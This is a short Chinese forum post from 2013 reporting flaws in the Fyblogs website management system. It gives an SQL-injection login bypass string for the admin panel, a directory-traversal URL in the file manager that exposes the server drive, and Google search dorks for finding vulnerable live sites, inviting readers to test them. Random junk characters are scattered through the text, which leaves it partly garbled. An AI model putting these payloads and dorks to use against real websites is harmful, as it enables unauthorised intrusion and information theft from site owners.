漏洞类型: 未授权访问/权限绕过
. S* p3 t. V/ j! C: }4 m6 C4 C& [% ~9 [9 ? f# n
简要描述:8 _' C* j% C6 O/ i0 P
p5 _7 D+ m3 ~/ ], Y5 N. f6 m, q
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 N$ `/ s' F+ f' f
: L( W' [9 j; w" X+ {: y( e详细说明:9 F- {, R9 F( }* }! g" ], y
1 s3 C5 R% d/ `6 f% G后台万能密码 'or'='or'
, e, V8 e. h; }5 F/ i5 Z( [" T后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
) C3 A8 m/ B9 B- d0 Qadmin/uploadfile.asp?currentFolder=/upfiles/../
: N) T& a) \$ G0 R. a0 _' [/ h% J# g7 ]3 u" Y! K
漏洞证明:) E4 Q; Y* Y. m7 G# x4 J
/ L! U# e* d2 m' Q w
谷歌:inurl:type.asp?id=1 新闻中心
9 ]" Y% a" A R7 I8 {& W- Q' b3 S或者 :inurl:download_ok.asp?; x4 j3 Q7 a$ {: [! ?8 O
" J7 r4 L4 f% K" _* ^2 {
可以测试
" k$ n2 k' n! [/ \3 x2 H# _2 o6 Y) @2 @
" H3 y0 {6 ]3 w) c" @) Q |
发表于 2013-3-7 13:07:46
收藏
支持
反对